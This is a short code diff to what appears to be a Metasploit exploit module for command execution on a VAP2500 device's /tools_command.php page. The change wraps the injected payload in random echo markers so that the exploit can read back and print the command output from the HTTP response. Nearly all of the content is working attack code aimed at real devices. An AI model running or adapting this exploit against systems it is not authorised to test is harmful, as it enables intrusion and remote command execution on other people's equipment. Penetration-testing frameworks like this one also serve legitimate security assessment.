Now with logging of command response output

Author: headlesszeke

modules/exploits/linux/http/vap2500_tools_command_exec.rb

@@ -77,13 +77,15 @@ def exploit
     print_status("#{peer} - Exploiting...")
 
     uri = '/tools_command.php'
+    beg_boundary = rand_text_alpha(8)
+    end_boundary = rand_text_alpha(8)
 
     begin
       res = send_request_cgi({
         'uri'    => uri,
         'vars_post' => {
           'cmb_header'  => '',
-          'txt_command' => payload.encoded
+          'txt_command' => "echo #{beg_boundary}; #{payload.encoded}; echo #{end_boundary}"
         },
         'method' => 'POST',
         'headers' => {
@@ -92,6 +94,9 @@ def exploit
       })
       if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/
         print_good("#{peer} - Command sent successfully")
+        if res.body.to_s =~ /#{beg_boundary}(.*)#{end_boundary}/m
+          print_status("#{peer} - Command output: #{$1}")
+        end
       else
         fail_with(Failure::UnexpectedReply, "#{peer} - Command execution failed")
       end